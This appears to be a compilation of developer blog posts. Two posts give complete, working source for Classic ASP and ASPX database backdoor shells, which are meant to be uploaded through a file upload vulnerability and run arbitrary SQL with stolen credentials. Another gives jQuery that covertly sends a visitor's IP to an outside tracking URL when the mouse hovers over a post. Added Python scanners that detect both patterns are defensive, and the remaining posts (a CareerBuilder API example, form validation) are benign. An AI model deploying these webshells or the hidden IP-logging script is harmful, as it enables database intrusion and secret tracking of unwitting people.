Classic ASP (Active Server Pages) With MS SQL Server DB Backdoor

Disclaimer: The information provided here is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly.

Assumption
———
1. The ASP.Net application has a file upload vulnerability.
2. We have obtained the username, password, database name and server name of the database.
3. The application does not allow the user to upload files with an extension longer than 3 characters.

Let’s get started.

1. Create an ASP page
Create an ASP page with no embedded VBScript code yet.

<% @Language=VBScript %>
<html dir=ltr>
<head>
<title>Classic asp DB Shell</title>
<style>	
.dblabel{width: 26%; float: left; padding: 0 0 4 0; text-align: right;}
.dbText{ width : 50%; float:left; padding: 0 0 4 0;}
</style>
</head>
<body>
<h1>Db Info</h1>
<form method="post">

</form>
</body>
</html>

2. Add basic fields
After adding the empty ASP page, we need to add the input fields whose values are passed to the connection string, as well as the query to be executed.

<div style="width:50%;">
   <div class="dblabel">Server Name : </div>
   <div class="dbText"><input type="text" name="sName" /></div>
   <div class="dblabel">Server Port : </div>
   <div class="dbText"><input type="text" name="sPort" /></div>
   <div class="dblabel">User Name : </div>
   <div class="dbText"><input type="text" name="dbUName" /></div>
   <div class="dblabel">Password : </div>
   <div class="dbText"><input type="text" name="dbPass" /></div>
   <div class="dblabel">Database : </div>
   <div class="dbText"><input type="text" name="dbName" /></div>
   <div class="dblabel">Query :</div>
   <div class="dbText"><textarea name="query" rows="4" cols="50"></textarea></div>
   <div class="dblabel"></div>
   <div class="dbText"><input type="submit" name="submit" value="Run Query"/></div>
</div>

3. Write Business logic
Start writing the business logic to execute the query. Validate all input fields before proceeding. After executing the query, display all records in tabular format.

<%
		Dim fname 
		fname=Request.Form("submit")
		
		Response.Buffer = True 
		On Error Resume Next
		
		Dim host
		Dim port
		Dim user
		Dim password
		Dim database

		host = Request.Form("sName")
		port = Request.Form("sPort")
		user = Request.Form("dbUName")
		password = Request.Form("dbPass")
		database = Request.Form("dbName")
		
		If host <> "" And port <> "" And user <> "" And password <> "" And database <> ""  Then
			Dim conn
			Set conn = Server.CreateObject("ADODB.Connection")
			Dim ds
			ds = host & "," & port
			Dim connString
			connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Network Library=DBMSSOCN;Initial Catalog=" & database & ";User Id=" & user & ";Password=" & password & ";"
			conn.Open connString
			If conn.Errors.Count > 0 Then
				Response.Write "Error: Unable to Connect" & Err.Description
				Response.END
			End If
			
			Dim query
			query = Request.Form("query")
			
			If query <> "" Then
				Set rs = conn.Execute(query)
				If conn.Errors.Count > 0 Then
					Response.Write "Error: " & Err.Description
				Else
					Response.Write "<html><body><table><tr>"
					For Each objField in rs.Fields
						Response.Write "<td>" & objField.Name & "</td>"
					Next
					Response.Write "</tr>"

					While Not rs.EOF
						Response.Write "<tr>"
						For Each objField in rs.Fields
							Response.Write "<td>" & rs(objField.Name) & "</td>"
						Next
						rs.MoveNext
						Response.Write "</tr>"
					Wend
					
					rs.Close
				End If
			End If
			
			conn.Close
			Set conn = Nothing
		End If
	%>

That’s all. This will establish a connection to MS SQL Server to get records from the DB.
Bingo….!!!!


Create ASP.NET Database Backdoor Shell

This post does not encourage any kind of malicious activity. It is intended for educational purposes only. Anyone who uses this code does so at their own risk. The developer is not responsible for any bad activities.

Assumption
———
1. The ASP.Net application has a file upload vulnerability.
2. We have obtained the username, password, database name and server name of the database, or we can directly use the connection string from Web.config, in which case there is no need to add those fields.

To use this technique, we first have to find a file upload vulnerability in the ASP.NET application.

If we want to create a DB backdoor, we need to know the database server. ASP.NET applications mostly use MS SQL Server as the database. Sometimes it can be MySQL, SQLite, Oracle, etc.

The developer should identify which database server is used by the vulnerable web application.

Let’s get started.

1. Create an aspx page
First we need to create an aspx page without a C# code-behind page. We are going to use inline ASP.NET code in the design page itself.

<%@ Page Language="C#" EnableViewState="false" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ASPX Shell</title>
</head>
<body>
<form id="form1" runat="server">
</form>
</body>
</html>

2. Add basic fields
After adding the empty aspx page, we need to add the input fields whose values are passed to the connection string, as well as the query to be executed.

Server Name : <asp:TextBox ID="txtServer" runat="server"></asp:TextBox> 

User Name :   <asp:TextBox ID="txtUName" runat="server"></asp:TextBox> 

Passcode :    <asp:TextBox ID="txtPass" runat="server"></asp:TextBox> 

DB Name :     <asp:TextBox ID="txtDBName" runat="server"></asp:TextBox>

Query :  <asp:TextBox TextMode="MultiLine" ID="txtQuery" runat="server"></asp:TextBox>

<asp:Button ID="btnRun" runat="server" Text="Run Query"/> 

3. Add GridView to display the result
When Run Query is clicked, the query needs to be executed and the result set displayed. To display this result set we can use a GridView.

<asp:GridView ID="grdResult" runat="server"></asp:GridView>

4. Add assembly references
For database communication we need to add assembly references. Add them using the Import Namespace directive.

<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data.Odbc" %>
<%@ Import Namespace="System.Data.SqlClient" %>

5. Write Business logic
Start writing the business logic to execute the query. Validate all input fields before proceeding.

<%
try
{
    if (!string.IsNullOrWhiteSpace(txtDBName.Text) && !string.IsNullOrWhiteSpace(txtServer.Text) && !string.IsNullOrWhiteSpace(txtUName.Text) && !string.IsNullOrWhiteSpace(txtPass.Text))
    {
        using (OdbcConnection connection = new OdbcConnection("DRIVER={MySQL ODBC 3.51 Driver};Database=" + txtDBName.Text + ";Server=" + txtServer.Text + ";UID=" + txtUName.Text + ";PWD=" + txtPass.Text + ";"))
        {
            connection.Open();
            using (OdbcCommand command = new OdbcCommand(txtQuery.Text, connection))
            using (OdbcDataReader dr = command.ExecuteReader())
            {
                grdResult.DataSource = dr;
                grdResult.DataBind();
            }
            connection.Close();
        }
    }
}
catch (Exception ex)
{
    Response.Write("An error occurred: " + ex.Message);
}
%>

With this logic you can create any database connection. The example here is a MySQL connection.
If you want to use other connections, you can modify the connection string part.

That’s it. You are ready to go.
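A detection-side counterpart to the two listings above, as an added example that is not part of the original posts: a heuristic scan of uploaded `.asp`/`.aspx` sources for request values that reach a connection string or are executed as SQL. The function name `scan_page`, the finding labels and the sample strings are constructed for this illustration.

```python
import re

# Request-controlled values: Classic ASP Request.Form/QueryString, or a WebForms control's .Text.
SOURCE = re.compile(r"Request\.(?:Form|QueryString)\s*\(|\b\w+\.Text\b", re.I)
ASSIGN = re.compile(r"^\s*(?:Set\s+)?(\w+)\s*=\s*(.+)$", re.I)
# Sinks: group 1 is the VBScript/ADO form, group 2 the ADO.NET constructor form.
SINKS = {
    "request value executed as SQL": re.compile(
        r"\.Execute\b\s*\(?\s*([^)\r\n]+)|new\s+\w*Command\s*\(([^,)]+)", re.I),
    "request value in connection string": re.compile(
        r"\.Open\s+(\w+)|new\s+\w*Connection\s*\((.+)", re.I),
}

def scan_page(text):
    """Return [(line_number, finding)] for one .asp/.aspx source file."""
    tainted, findings = set(), []

    def is_tainted(expr):
        return bool(SOURCE.search(expr)) or any(
            re.search(r"\b%s\b" % re.escape(v), expr, re.I) for v in tainted)

    for lineno, line in enumerate(text.splitlines(), 1):
        for label, sink in SINKS.items():
            m = sink.search(line)
            if m and is_tainted(m.group(1) or m.group(2)):
                findings.append((lineno, label))
        m = ASSIGN.match(line)
        if m and is_tainted(m.group(2)):   # propagate taint through assignments
            tainted.add(m.group(1).lower())
    return findings

# Constructed samples: lines trimmed from the two listings in these posts,
# plus a benign page that uses a fixed connection string and a parameter.
CLASSIC_ASP = '''host = Request.Form("sName")
connString = "Provider=SQLOLEDB;Data Source=" & host & ";"
conn.Open connString
query = Request.Form("query")
Set rs = conn.Execute(query)'''

ASPX = '''using (OdbcConnection connection = new OdbcConnection("Server=" + txtServer.Text + ";"))
using (OdbcCommand command = new OdbcCommand(txtQuery.Text, connection))
using (OdbcDataReader dr = command.ExecuteReader())'''

BENIGN = '''using (SqlConnection c = new SqlConnection(ConfigurationManager.ConnectionStrings["app"].ConnectionString))
using (SqlCommand cmd = new SqlCommand("SELECT Name FROM Users WHERE Id = @id", c))
cmd.Parameters.AddWithValue("@id", txtId.Text);'''

if __name__ == "__main__":
    for name, src in (("classic.asp", CLASSIC_ASP), ("shell.aspx", ASPX), ("benign.aspx", BENIGN)):
        print(name, scan_page(src))
```

The scan is line-based and heuristic, so it suits triage of an upload directory or a code review queue rather than a guarantee that a file is clean.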


2014 in review

The WordPress.com stats helper monkeys prepared a 2014 annual report for this blog.

Here’s an excerpt:

A San Francisco cable car holds 60 people. This blog was viewed about 500 times in 2014. If it were a cable car, it would take about 8 trips to carry that many people.



Trace IP of your friend using a Image post

I am going to explain how we can trace a friend's IP address using simple jQuery code.

Move your mouse over the image.

 

That is where the trick works. I have written a simple script that fires an ajax function, which traces the client IP and sends it to my personal mail address.

Let's get started.

This post is only for learning and exploring new things, not for breaking the law. If anyone tries to use this for bad things, I am not responsible.

Step 1 :

Create URL for getting the IP address.

For this, I first created a URL that traces the IP address of the user who clicks the link. We can use the http://www.whatstheirip.com/ site. Just enter your personal email address and click the get link button; this will give you a link with the proper details. The link looks like this: “http://www.bvog.com/?post=IDsk0Ur7YbKVpjneIq”.

 

Step 2:

The next step is to expose this URL. If you send this to your friend and ask him to click, he is not going to click. So we can use a small SE (Social Engineering) trick to achieve this. Create an interesting post and add the script below to that post.

function AttackScript(){
    $("#aIdDestination").mouseover(function(){
           EventMouse();
    }).mouseout(function(){
           EventMouse();
    });
}

function EventMouse(){
    $("a#idLink").click();
}

In the above script I attached mouseover and mouseout events to the “aIdDestination” div. So when a user moves the mouse over or out of this div, the event fires; there is no need to click the link. I click the link using jQuery. After the click, the page redirects to a 404 page.

Here the user can find out that something happened when he moved his mouse over this div, and he may take preventive action. So I made a small change to the above script and added an ajax call to that URL, so the user never knows that something happened.

function EventMouse(){
   $.ajax({
         url: "http://www.bvog.com/?post=IDsk0Ur7YbKVpteIq",
         context: document.body
   });
}

There it is: I successfully clicked the URL without any indication to the end user.
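From the side of a site that hosts user posts, the hover-triggered request described above can be caught at review time. The following added example (not from the original post) audits a post's inline scripts for hover bindings and for request URLs on other hosts; `audit_post`, the host names and the sample posts are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL = re.compile(r"""["'](https?://[^"'\s]+)["']""", re.I)
HOVER = re.compile(
    r"\.(?:mouseover|mouseout|mouseenter|mouseleave|hover)\s*\(|\bonmouse(?:over|out)\b", re.I)

class ScriptCollector(HTMLParser):
    """Collect the bodies of inline <script> elements from a post's HTML."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def audit_post(html, site_host):
    """Report hover bindings and absolute URLs pointing away from site_host."""
    collector = ScriptCollector()
    collector.feed(html)
    code = "\n".join(collector.scripts)
    hosts = {urlsplit(u).hostname for u in URL.findall(code)}
    return {"hover_bound": bool(HOVER.search(code)),
            "offsite_hosts": sorted(h for h in hosts if h and h != site_host)}

# Constructed post bodies; the tracker URL is a placeholder, not the one from the post.
POST = '''<div id="aIdDestination"><img src="/img/cat.png"></div>
<script>
$("#aIdDestination").mouseover(function(){ EventMouse(); });
function EventMouse(){ $.ajax({ url: "http://tracker.example/?post=PLACEHOLDER" }); }
</script>'''

CLEAN = '<p>Hello</p><script>$.ajax({ url: "https://blog.example/api/likes" });</script>'

if __name__ == "__main__":
    print(audit_post(POST, "blog.example"))
    print(audit_post(CLEAN, "blog.example"))
```

A post that combines a hover binding with an off-site request target is the pattern worth a manual look; a `Content-Security-Policy` with `connect-src 'self'` blocks the request itself in the reader's browser.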


CareerBuilder API DOT NET Code


This post is about consuming the CareerBuilder REST service from .NET.

To consume any REST service, we first need to know the URL of the respective REST service. If the service provider issues a public key or private key, you need to get it from the service provider before using the REST service.

This also applies to the CareerBuilder REST service. To obtain a key, visit the CareerBuilder site http://api.careerbuilder.com, where you can get your own private key.

After receiving your private key you can start integrating the CareerBuilder REST service into your application. I created a sample application for the “JobSearch” functionality. In the sample application I created a TextBox for searching jobs through the CareerBuilder service method. There are a lot of search criteria available in the service, but I used only the “Skill” parameter; according to your requirements you can use any number of parameters.

I created a Model class to bind the individual job. Finally, the ListJobs method returns a List<Jobs> as a generic list, which I am binding to a GridView.

Note: I removed my private key and replaced it with XXXXXX values. You can use your private key in that place.


// Requires: using System; using System.IO; using System.Net; using System.Xml;
public static string devKey = "XXXXXXXXXXXXXXXXXXXX";
public static string URL = "http://api.careerbuilder.com/v1/jobsearch";

#region JobSearch Web Request
private XmlDocument ListJobSearch()
{
    XmlDocument xDoc = new XmlDocument();
    // URL-encode the user-entered skill so characters such as '&' or '='
    // cannot add or override query-string parameters.
    string _url = URL + "?DeveloperKey=" + devKey + "&Skills=" + Uri.EscapeDataString(txtSkill.Text);
    WebRequest objRequest = WebRequest.Create(_url);
    objRequest.Method = "GET";
    objRequest.ContentType = "application/xml";
    // Dispose the response and reader once the body has been read.
    // Exceptions propagate to the caller with their original stack trace.
    using (WebResponse objResponse = objRequest.GetResponse())
    using (StreamReader reader = new StreamReader(objResponse.GetResponseStream()))
    {
        xDoc.LoadXml(reader.ReadToEnd());
    }
    return xDoc;
}
#endregion

In the above code snippet I call the REST service with the user-entered skill captured from the textbox. This returns an XML value. I take the XML, load it into an XML document, and convert the XML document to List<jobs> in the ListJobs method shown below.

#region ListJobs Method
private List<JobSearchModel> ListJobs()
{
    List<JobSearchModel> objList = new List<JobSearchModel>();
    XmlDocument xDoc = ListJobSearch();
    XmlNodeList objNoe = xDoc.SelectNodes("/ResponseJobSearch/Results/JobSearchResult");
    foreach (XmlNode xn in objNoe)
    {
        // Map each <JobSearchResult> element onto the model.
        JobSearchModel objSearchMode = new JobSearchModel();
        objSearchMode.Company = xn["Company"].InnerText;
        objSearchMode.JobTitle = xn["JobTitle"].InnerText;
        objSearchMode.CompanyDID = xn["CompanyDID"].InnerText;
        objSearchMode.CompanyDetailsURL = xn["CompanyDetailsURL"].InnerText;
        objSearchMode.ONetFriendlyTitle = xn["ONetFriendlyTitle"].InnerText;
        objSearchMode.DescriptionTeaser = xn["DescriptionTeaser"].InnerText;
        objSearchMode.EmploymentType = xn["EmploymentType"].InnerText;
        objSearchMode.JobDetailsURL = xn["JobDetailsURL"].InnerText;
        objSearchMode.JobServiceURL = xn["JobServiceURL"].InnerText;
        objSearchMode.Location = xn["Location"].InnerText;
        objSearchMode.PostedDate = xn["PostedDate"].InnerText;
        objSearchMode.Pay = xn["Pay"].InnerText;
        objSearchMode.SimilarJobsURL = xn["SimilarJobsURL"].InnerText;
        objSearchMode.CompanyImageURL = xn["CompanyImageURL"].InnerText;

        objList.Add(objSearchMode);
    }
    // Exceptions propagate to the caller with their original stack trace.
    return objList;
}
#endregion

After converting the XmlDocument to List<T>, I bind this list to a GridView. The GridView will display every job. You can design your own format to display the jobs.

Comments are inevitable.


Use “onblur” javascript event to validate aspx page textbox

Download sample here

“onblur” is a JavaScript event; it fires when you leave the text field.

This is the nature of “onblur”. It has a drawback that I ran into. The drawback is that if you want to validate two textboxes one after the other and you use this event, it will validate fine if you move to the next box without entering any value. My condition is that when a required field is empty, it should show an error message and the focus should go to the empty field. I wrote the code for this as shown below.

 

function ValidateName() {
    var gName = $get('<%= txtName.ClientID %>');
    if (gName.value == "") {
        alert("Name should not be empty");
        gName.focus();
    }
}

function ValidateAge() {
    var gName = $get('<%= txtAge.ClientID %>');
    if (gName.value == "") {
        alert("Age should not be empty");
        gName.focus();
    }
}

 

What happened is that this code gave me a problem. I didn’t enter a value in the “txtName” field and pressed the Tab key; it gave me an alert box saying “Name should not be empty”. I felt okay, it’s working properly. Then I clicked the OK button, and the next alert message was displayed: “Age should not be empty”. I was confused about what happened: I hadn’t gone to the Age text field, so why was it displaying this alert box? To check the code I clicked the OK button on that alert too, then came the first error message, then the next, and so on. It seemed like an infinite loop for those fields.

 

Then I posted this problem in the MSDN forums and one guy explained the problem to me. I hadn’t thought of it in that manner. Anyhow, I will explain the problem. When I pressed the Tab key, control moved by default to the next control, the Age textbox. At that time the validation checks whether the first box is empty; if yes, it displays the error message. The next statement tries to focus the cursor on the Name field, so it tries to put the cursor into that field; the next field also has an “onblur” event, so it fired and displayed the error, and so on.

For this problem I wrote another method to solve it. It is shown below.

 

function validateFirstName(data, fieldName) {
    var x = data.value;
    if (x == null || x == "") {
        alert(fieldName + " cannot be left blank.");
        data.focus();
        return;
    }
}
function validate(data, fieldName, oldvalue) {
    var x = data.value;
    var y = oldvalue.value;
    if (y == null || y == "") {
        //oldvalue.focus();
    }
    else {
        if (x == null || x == "") {
            alert(fieldName + " cannot be left blank.");
            data.focus();
        }
    }
}

 

Here I validate the first field normally. From the next field onwards I use the second method, so it first checks the previous field; if that is also empty, it won’t do anything. So there is no problem and we can do our work.

 

<div style="width:100%;">
    <span style="width:50%;">First Name :</span>
    <asp:TextBox ID="txtFirstName" runat="server" style="width:50%;" onblur="validateFirstName(this,'First Name');" />
</div><br />
<div style="width:100%;">
    <span style="width:50%;">Last Name :</span>
    <asp:TextBox ID="txtLastName" runat="server" style="width:50%;" onblur="validate(this,'Last Name',document.getElementById('txtFirstName'))" />
</div><br />
<div style="width:100%;">
    <span style="width:50%;">Primary EMail :</span>
    <asp:TextBox ID="txtPrimaryEmail" runat="server" style="width:50%;" onblur="validate(this,'Primary Email',document.getElementById('txtLastName'))" />
</div><br />

 

This is the code I used to validate. You can download the sample code from the above link.
